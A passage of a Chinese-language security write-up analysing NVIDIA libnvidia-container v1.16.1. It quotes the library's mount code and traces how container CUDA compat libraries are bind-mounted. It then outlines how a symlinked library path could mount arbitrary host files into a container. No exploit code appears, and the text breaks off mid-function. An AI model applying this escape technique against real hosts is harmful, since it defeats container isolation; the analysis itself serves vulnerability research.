if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) {
log_errf("error mounting firmware path %s", info->firmwares[i]);
goto fail;
}
}
/* IPC mounts */
for (size_t i = 0; i < info->nipcs; ++i) {
/* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */
if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) || str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) {
if (!(cnt->flags & OPT_UTILITY_LIBS))
continue;
} elseif (!(cnt->flags & OPT_COMPUTE_LIBS))
continue;
if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL)
goto fail;
}
/* Device mounts */
for (size_t i = 0; i < info->ndevs; ++i) {
/* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */
if (!ctx->dxcore.initialized) {
/* XXX Only compute libraries require specific devices (e.g. UVM). */
if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR)
continue;
/* XXX Only display capability requires the modeset device. */
if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR)
continue;
}
if (!(cnt->flags & OPT_NO_DEVBIND)) {
if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL)
goto fail;
}
if (!(cnt->flags & OPT_NO_CGROUPS)) {
if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0)
goto fail;
}
}
rv = 0;
fail:
if (rv < 0) {
for (size_t i = 0; mnt != NULL && i < nmnt; ++i)
unmount(mnt[i]);
assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS));
} else {
rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS);
}
array_free((char **)mnt, nmnt);
return (rv);
}
2.9 挂载容器 cuda 库文件
重点分析从容器挂载到容器的操作,即cuda前向兼容特性。
根据收集到的容器内的cuda库文件 cnt->libs,经 filter_libraries 过滤后,挂载到容器内。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
...
}
其中 cnt->libs 为容器的 /usr/local/cuda/compat/lib*.so.* 文件。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61
static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
char path[PATH_MAX];
glob_t gl;
int rv = -1;
char **ptr;
if (!(cnt->flags & OPT_COMPUTE_LIBS))
return (0);
if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
return (-1);
if (path_append(err, path, "compat/lib*.so.*") < 0)
return (-1);
if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
goto fail;
if (gl.gl_pathc > 0) {
cnt->nlibs = gl.gl_pathc;
cnt->libs = ptr = array_new(err, gl.gl_pathc);
if (cnt->libs == NULL)
goto fail;
for (size_t i = 0; i < gl.gl_pathc; ++i) {
if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
goto fail;
if (!str_array_match(path, (const char * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
log_infof("selecting %s%s", cnt->cfg.rootfs, path);
if ((*ptr++ = xstrdup(err, path)) == NULL)
goto fail;
}
}
array_pack(cnt->libs, &cnt->nlibs);
}
rv = 0;
fail:
globfree(&gl);
return (rv);
}
filter_libraries 函数主要过滤出同时满足以下条件的库,才执行挂载:
- 文件名中要有 .so.
- 库的主版本号与主机 NVIDIA 驱动(RM)版本不匹配

例如,主机驱动版本为 470.223.02 时,compat 目录下的 libcuda.so.560.35.03(主版本 560 ≠ 470)会被保留并挂载,而 libcuda.so.470.* 会被过滤掉。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
char *lib, *maj;
/*
* XXX Filter out any library that matches the major version of RM to prevent us from
* running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
*/
for (size_t i = 0; i < *size; ++i) {
lib = basename(paths[i]);
if ((maj = strstr(lib, ".so.")) != NULL) {
maj += strlen(".so.");
if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
continue;
}
paths[i] = NULL;
}
array_pack(paths, size);
}
3. 漏洞分析
3.1 漏洞点分析
首先让我们预设漏洞效果: 可以从主机挂载任意文件到容器。要达到这样的效果,条件是挂载的源地址要可控。
根据章节“2. 调用链分析”,cuda前向兼容特性提供了这样一个机会:从容器挂载文件到容器。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
...
}
令libs路径为指向主机目录的软链接,如果后续没有防护措施,则可能达成漏洞效果。
挂载时没有什么防护,只需文件名通过 match_binary_flags() 或 match_library_flags() 的检查。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100
static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
char src[PATH_MAX];
char dst[PATH_MAX];
mode_t mode;
char *src_end, *dst_end, *file;
char **mnt, **ptr;
if (path_new(err, src, root) < 0)
return (NULL);
if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
return (NULL);
if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
return (NULL);
src_end = src + strlen(src);
dst_end = dst + strlen(dst);
mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
if (mnt == NULL)
return (NULL);
for (size_t i = 0; i < size; ++i) {
file = basename(paths[i]);
if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
continue;
if (path_append(err, src, paths[i]) < 0)
goto fail;
if (path_append(err, dst, file) < 0)
goto fail;
if (file_mode(err, src, &mode) < 0)
goto fail;
if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
goto fail;
log_infof("mounting %s at %s", src, dst);
if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
goto fail;
if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
goto fail;
if ((*ptr++ = xstrdup(err, dst)) == NULL)
goto fail;
*src_end = '